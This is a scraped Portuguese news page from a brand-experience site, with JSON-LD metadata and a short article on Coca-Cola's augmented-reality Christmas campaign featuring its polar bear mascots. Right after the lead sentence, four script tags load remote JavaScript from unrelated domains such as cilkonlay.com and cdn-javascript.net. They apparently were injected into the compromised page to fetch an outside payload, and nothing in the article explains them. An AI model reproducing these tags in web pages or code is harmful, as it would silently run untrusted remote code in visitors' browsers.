\n\n\n\n\n\n","alternativeHeadline":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.\n\n\n\n\n\n\n\n","abstract":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.\n\n\n\n\n\n\n\n","articleBody":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso, e, agora – além das peças tradicionais e esperadas -, os mascotes mais reconhecidos do Natal ganham sua primeira incursão na realidade aumentada.\r\n\r\nA agência criativa in-house, Coca-Cola Digital Platforms, colaborou com o Tactic Studio, de São Francisco, para criar uma série de experiências de AR para iOS ou Android.\r\n\r\nConfira as últimas novidades sobre marketing digital aqui.\r\n\r\nLeia também: Natal da Coca-Cola já está no ar.\r\n\r\nEm uma delas, você pode digitalizar latas e garrafas com tema das festividades do fim de ano para transformar a embalagem em uma recriação digital do domínio gelado dos ursos polares.\r\n\r\n\r\n\r\n“Queríamos oferecer aos fãs uma nova maneira divertida de interagir com a marca e dar vida à magia dos ursos polares.", disse Allie Blalock, gerente de envolvimento digital da Coca-Cola na América do Norte em um anúncio para a imprensa.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Mídia"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/","url":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/","name":"Coca-Cola cria ações em realidade aumentada para o Natal - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","datePublished":"2019-11-17T06:37:00+00:00","dateModified":"2025-04-25T04:22:05+00:00","description":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.","breadcrumb":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","contentUrl":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","width":800,"height":375},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Mídia","item":"https://www.promoview.com.br/experiencia-de-marca/midia/"},{"@type":"ListItem","position":4,"name":"Coca-Cola cria ações em realidade aumentada para o Natal"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}

Mídia

Coca-Cola cria ações em realidade aumentada para o Natal

Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573167018639" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso, e, agora – além das peças tradicionais e esperadas -, os mascotes mais reconhecidos do Natal ganham sua primeira incursão na realidade aumentada.

A agência criativa in-house, Coca-Cola Digital Platforms, colaborou com o Tactic Studio, de São Francisco, para criar uma série de experiências de AR para iOS ou Android.

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Natal da Coca-Cola já está no ar.

Em uma delas, você pode digitalizar latas e garrafas com tema das festividades do fim de ano para transformar a embalagem em uma recriação digital do domínio gelado dos ursos polares.

“Queríamos oferecer aos fãs uma nova maneira divertida de interagir com a marca e dar vida à magia dos ursos polares.", disse Allie Blalock, gerente de envolvimento digital da Coca-Cola na América do Norte em um anúncio para a imprensa.